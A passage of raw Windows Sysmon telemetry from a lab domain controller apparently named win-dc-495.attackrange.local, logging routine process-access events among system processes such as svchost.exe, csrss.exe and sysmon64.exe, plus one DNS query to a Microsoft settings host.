13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2401-00000000A301}3664C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2401-00000000A301}3664C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.034{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000005309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.070{59A5CD1D-8E46-6005-1600-00000000A301}1544settings-win.data.microsoft.com0type: 5 settingsfd-geo.trafficmanager.net;::ffff:51.124.78.146;C:\Windows\System32\svchost.exe 10341000x80000000000000005317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:03.721{59A5CD1D-90A0-6005-2C01-00000000A301}27922760C:\Windows\system32\conhost.exe{59A5CD1D-90A3-6005-3001-00000000A301}4144C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.721{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A3-6005-3001-00000000A301}4144C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.721{59A5CD1D-90A0-6005-2901-00000000A301}44401132C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{59A5CD1D-90A3-6005-3001-00000000A301}4144C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.D